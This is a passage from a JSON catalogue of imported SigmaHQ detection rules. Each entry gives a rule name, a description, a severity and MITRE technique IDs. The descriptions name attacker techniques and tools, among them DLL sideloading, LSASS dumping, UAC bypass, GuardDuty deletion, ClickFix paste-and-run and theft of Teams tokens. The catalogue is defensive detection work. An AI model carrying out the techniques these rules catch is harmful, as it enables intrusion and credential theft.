"source_id": "d2451be2-b582-4e15-8701-4196ac180260", "source_commit": "df5c6a6", "license": "DRL-1.1", 
"license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_keyscrambler.yml" } }, { "id": "sigmahq-sigma-d2605a99-2218-4894-8fd3-2afb7946514d", "type": "detection", "name": "Potential Mfdetours.DLL Sideloading", "description": "Detects potential DLL sideloading of \"mfdetours.dll\". While using \"mftrace.exe\" it can be abused to attach to an arbitrary process and force load any DLL named \"mfdetours.dll\" from the current directory of execution.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-mfdetours-dll-sideloading.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d2605a99-2218-4894-8fd3-2afb7946514d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_mfdetours.yml" } }, { "id": "sigmahq-sigma-d2656e78-c069-4571-8220-9e0ab5913f19", "type": "detection", "name": "AWS GuardDuty Detector Deleted Or Updated", "description": "Detects successful deletion or disabling of an AWS GuardDuty detector, possibly by an attacker trying to avoid detection of its malicious activities.\nUpon deletion, GuardDuty stops monitoring the environment and all existing findings are lost.\nVerify with the user identity that this activity is legitimate.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685", "T1685.002" ], "log_source": 
null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aws-guardduty-detector-deleted-or-updated.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d2656e78-c069-4571-8220-9e0ab5913f19", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_cloudtrail_guardduty_detector_deleted_or_updated.yml" } }, { "id": "sigmahq-sigma-d26ce60c-2151-403c-9a42-49420d87b5e4", "type": "detection", "name": "HackTool Service Registration or Execution", "description": "Detects installation or execution of services", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-service-registration-or-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d26ce60c-2151-403c-9a42-49420d87b5e4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_service_install_hacktools.yml" } }, { "id": "sigmahq-sigma-d27ab432-2199-483f-a297-03633c05bae6", "type": "detection", "name": "OS Architecture Discovery Via Grep", "description": "Detects the use of grep to identify information about the operating system architecture. 
Often combined beforehand with the execution of \"uname\" or \"cat /proc/cpuinfo\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1082" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/os-architecture-discovery-via-grep.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d27ab432-2199-483f-a297-03633c05bae6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_grep_os_arch_discovery.yml" } }, { "id": "sigmahq-sigma-d292e0af-9a18-420c-9525-ec0ac3936892", "type": "detection", "name": "Suspicious Java Children Processes", "description": "Detects java process spawning suspicious children", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-java-children-processes.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d292e0af-9a18-420c-9525-ec0ac3936892", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_susp_java_children.yml" } }, { "id": "sigmahq-sigma-d29a20b2-be4b-4827-81f2-3d8a59eab5fc", "type": "detection", "name": 
"Sysinternals Tools AppX Versions Execution", "description": "Detects execution of Sysinternals tools via an AppX package.\nAttackers could install the Sysinternals Suite to get access to tools such as psexec and procdump to avoid detection based on System paths.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/sysinternals-tools-appx-versions-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d29a20b2-be4b-4827-81f2-3d8a59eab5fc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/appmodel_runtime/win_appmodel_runtime_sysinternals_tools_appx_execution.yml" } }, { "id": "sigmahq-sigma-d29ada0f-af45-4f27-8f32-f7b77c3dbc4e", "type": "detection", "name": "HackTool - SysmonEnte Execution", "description": "Detects the use of SysmonEnte, a tool to attack the integrity of Sysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-sysmonente-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d29ada0f-af45-4f27-8f32-f7b77c3dbc4e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", 
"imported_at": "2026-05-04", "upstream_path": "rules/windows/process_access/proc_access_win_hktl_sysmonente.yml" } }, { "id": "sigmahq-sigma-d2b749ee-4225-417e-b20e-a8d2193cbb84", "type": "detection", "name": "PUA - AdvancedRun Execution", "description": "Detects the execution of AdvancedRun utility", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1564.003", "T1134.002", "T1059.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-advancedrun-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d2b749ee-4225-417e-b20e-a8d2193cbb84", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pua_advancedrun.yml" } }, { "id": "sigmahq-sigma-d2d642d7-b393-43fe-bae4-e81ed5915c4b", "type": "detection", "name": "Scheduled Task/Job At", "description": "Detects the use of at/atd which are utilities that are used to schedule tasks.\nThey are often abused by adversaries to maintain persistence or to perform task scheduling for initial or recurring execution of malicious code", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "endpoint", "mitre_techniques": [ "T1053.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/scheduled-task-job-at.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d2d642d7-b393-43fe-bae4-e81ed5915c4b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": 
"https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_at_command.yml" } }, { "id": "sigmahq-sigma-d2d901db-7a75-45a1-bc39-0cbf00812192", "type": "detection", "name": "Number Of Resource Creation Or Deployment Activities", "description": "Number of VM creations or deployment activities occur in Azure via the azureactivity log.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/number-of-resource-creation-or-deployment-activities.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d2d901db-7a75-45a1-bc39-0cbf00812192", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/activity_logs/azure_creating_number_of_resources_detection.yml" } }, { "id": "sigmahq-sigma-d2e3f2f6-7e09-4bf2-bc5d-90186809e7fb", "type": "detection", "name": "PowerShell Script With File Upload Capabilities", "description": "Detects PowerShell scripts leveraging the \"Invoke-WebRequest\" cmdlet to send data via either \"PUT\" or \"POST\" method.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1020" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-script-with-file-upload-capabilities.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by 
the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d2e3f2f6-7e09-4bf2-bc5d-90186809e7fb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_script_with_upload_capabilities.yml" } }, { "id": "sigmahq-sigma-d2eb17db-1d39-41dc-b57f-301f6512fa75", "type": "detection", "name": "Potentially Suspicious Command Targeting Teams Sensitive Files", "description": "Detects a commandline containing references to the Microsoft Teams database or cookies files from a process other than Teams.\nThe database might contain authentication tokens and other sensitive information about the logged in accounts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1528" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-command-targeting-teams-sensitive-files.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d2eb17db-1d39-41dc-b57f-301f6512fa75", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_teams_suspicious_command_line_cred_access.yml" } }, { "id": "sigmahq-sigma-d353dac0-1b41-46c2-820c-d7d2561fc6ed", "type": "detection", "name": "AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl - File", "description": "Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)", "version": "1.0.0", "author": "AiSOC", "tags": 
[ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1216" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/awl-bypass-with-winrm-vbs-and-malicious-wsmpty-xsl-wsmtxt-xsl-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d353dac0-1b41-46c2-820c-d7d2561fc6ed", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_winrm_awl_bypass.yml" } }, { "id": "sigmahq-sigma-d36f7c12-14a3-4d48-b6b8-774b9c66f44d", "type": "detection", "name": "Potential Python DLL SideLoading", "description": "Detects potential DLL sideloading of Python DLL files.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-python-dll-sideloading.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d36f7c12-14a3-4d48-b6b8-774b9c66f44d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_python.yml" } }, { "id": "sigmahq-sigma-d36f87ea-c403-44d2-aa79-1a0ac7c24456", "type": "detection", "name": "PUA - RemCom Default Named Pipe", "description": "Detects default RemCom pipe creation", "version": "1.0.0", "author": 
"AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.002", "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-remcom-default-named-pipe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d36f87ea-c403-44d2-aa79-1a0ac7c24456", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/pipe_created/pipe_created_pua_remcom_default_pipe.yml" } }, { "id": "sigmahq-sigma-d38d2fa4-98e6-4a24-aff1-410b0c9ad177", "type": "detection", "name": "HackTool - UACMe Akagi Execution", "description": "Detects the execution of UACMe, a tool used for UAC bypasses, via default PE metadata", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-uacme-akagi-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d38d2fa4-98e6-4a24-aff1-410b0c9ad177", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_uacme.yml" } }, { "id": "sigmahq-sigma-d3abac66-f11c-4ed0-8acb-50cc29c97eed", "type": "detection", "name": "NetNTLM Downgrade Attack", "description": "Detects NetNTLM downgrade attack", "version": 
"1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685", "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/netntlm-downgrade-attack.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d3abac66-f11c-4ed0-8acb-50cc29c97eed", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_net_ntlm_downgrade.yml" } }, { "id": "sigmahq-sigma-d3adb3ef-b7e7-4003-9092-1924c797db35", "type": "detection", "name": "AWS Identity Center Identity Provider Change", "description": "Detects a change in the AWS Identity Center (FKA AWS SSO) identity provider.\nA change in identity provider allows an attacker to establish persistent access or escalate privileges via user impersonation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1556" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aws-identity-center-identity-provider-change.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d3adb3ef-b7e7-4003-9092-1924c797db35", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_sso_idp_change.yml" } }, { "id": 
"sigmahq-sigma-d3b70aad-097e-409c-9df2-450f80dc476b", "type": "detection", "name": "PUA - DIT Snapshot Viewer", "description": "Detects the use of Ditsnap tool, an inspection tool for Active Directory database, ntds.dit.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-dit-snapshot-viewer.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d3b70aad-097e-409c-9df2-450f80dc476b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pua_ditsnap.yml" } }, { "id": "sigmahq-sigma-d3bf399f-b0cf-4250-8bb4-dfc192ab81dc", "type": "detection", "name": "Ie4uinit Lolbin Use From Invalid Path", "description": "Detect use of ie4uinit.exe to execute commands from a specially prepared ie4uinit.inf file from a directory other than the usual directories", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/ie4uinit-lolbin-use-from-invalid-path.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d3bf399f-b0cf-4250-8bb4-dfc192ab81dc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", 
"imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_ie4uinit.yml" } }, { "id": "sigmahq-sigma-d3c3861d-c504-4c77-ba55-224ba82d0118", "type": "detection", "name": "New Network Trace Capture Started Via Netsh.EXE", "description": "Detects the execution of netsh with the \"trace\" flag in order to start a network capture", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1040" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-network-trace-capture-started-via-netsh-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d3c3861d-c504-4c77-ba55-224ba82d0118", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_netsh_packet_capture.yml" } }, { "id": "sigmahq-sigma-d3f90469-fb05-42ce-b67d-0fded91bbef3", "type": "detection", "name": "Bitbucket User Login Failure Via SSH", "description": "Detects SSH user login access failures.\nPlease note that this rule can be noisy and is recommended to use with correlation based on \"author.name\" field.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.004", "T1110" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/bitbucket-user-login-failure-via-ssh.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", 
"provenance": { "source": "SigmaHQ/sigma", "source_id": "d3f90469-fb05-42ce-b67d-0fded91bbef3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/bitbucket/audit/bitbucket_audit_user_login_failure_via_ssh_detected.yml" } }, { "id": "sigmahq-sigma-d3feb4ee-ff1d-4d3d-bd10-5b28a238cc72", "type": "detection", "name": "File and Directory Discovery - Linux", "description": "Detects usage of system utilities such as \"find\", \"tree\", \"findmnt\", etc, to discover files, directories and network shares.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1083" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/file-and-directory-discovery-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d3feb4ee-ff1d-4d3d-bd10-5b28a238cc72", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_file_and_directory_discovery.yml" } }, { "id": "sigmahq-sigma-d443095b-a221-4957-a2c4-cd1756c9b747", "type": "detection", "name": "Suspicious Base64 Encoded User-Agent", "description": "Detects suspicious encoded User-Agent strings, as seen used by some malware.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1071.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/suspicious-base64-encoded-user-agent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d443095b-a221-4957-a2c4-cd1756c9b747", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/proxy_generic/proxy_ua_base64_encoded.yml" } }, { "id": "sigmahq-sigma-d4488827-73af-4f8d-9244-7b7662ef046e", "type": "detection", "name": "Change User Agents with WebRequest", "description": "Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic.\nCommands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1071.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/change-user-agents-with-webrequest.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d4488827-73af-4f8d-9244-7b7662ef046e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_invoke_webrequest_useragent.yml" } }, { "id": "sigmahq-sigma-d4498716-1d52-438f-8084-4a603157d131", "type": "detection", "name": "Password Provided In Command Line Of Net.EXE", "description": "Detects a when net.exe is called with a 
password in the command line", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.002", "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/password-provided-in-command-line-of-net-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d4498716-1d52-438f-8084-4a603157d131", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_net_use_password_plaintext.yml" } }, { "id": "sigmahq-sigma-d474c8fe-bb69-4ea0-b7d9-f682b56d52d3", "type": "detection", "name": "HackTool - Doppelanger LSASS Dumper Execution", "description": "Detects the execution of the Doppelanger hacktool which is used to dump LSASS memory via process cloning while evading common detection methods", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-doppelanger-lsass-dumper-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d474c8fe-bb69-4ea0-b7d9-f682b56d52d3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_doppelganger.yml" } }, { 
"id": "sigmahq-sigma-d487ed4a-fd24-436d-a0b2-f4e95f7b2635", "type": "detection", "name": "Suspicious ClickFix/FileFix Execution Pattern", "description": "Detects suspicious execution patterns where users are tricked into running malicious commands via clipboard manipulation, either through the Windows Run dialog (ClickFix) or File Explorer address bar (FileFix).\nAttackers leverage social engineering campaigns\u2014such as fake CAPTCHA challenges or urgent alerts\u2014encouraging victims to paste clipboard contents, often executing mshta.exe, powershell.exe, or similar commands to infect systems.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1204.001", "T1204.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-clickfix-filefix-execution-pattern.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d487ed4a-fd24-436d-a0b2-f4e95f7b2635", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_clickfix_filefix_execution.yml" } }, { "id": "sigmahq-sigma-d4a11f63-2390-411c-9adf-d791fd152830", "type": "detection", "name": "Windows Screen Capture with CopyFromScreen", "description": "Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation.\nScreen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ 
"T1113" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-screen-capture-with-copyfromscreen.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d4a11f63-2390-411c-9adf-d791fd152830", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_capture_screenshots.yml" } }, { "id": "sigmahq-sigma-d4c7758e-9417-4f2e-9109-6125d66dabef", "type": "detection", "name": "User Risk and MFA Registration Policy Updated", "description": "Detects changes and updates to the user risk and MFA registration policy.\nAttackers can modified the policies to Bypass MFA, weaken security thresholds, facilitate further attacks, maintain persistence.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/user-risk-and-mfa-registration-policy-updated.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d4c7758e-9417-4f2e-9109-6125d66dabef", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/audit_logs/azure_update_risk_and_mfa_registration_policy.yml" } }, { "id": 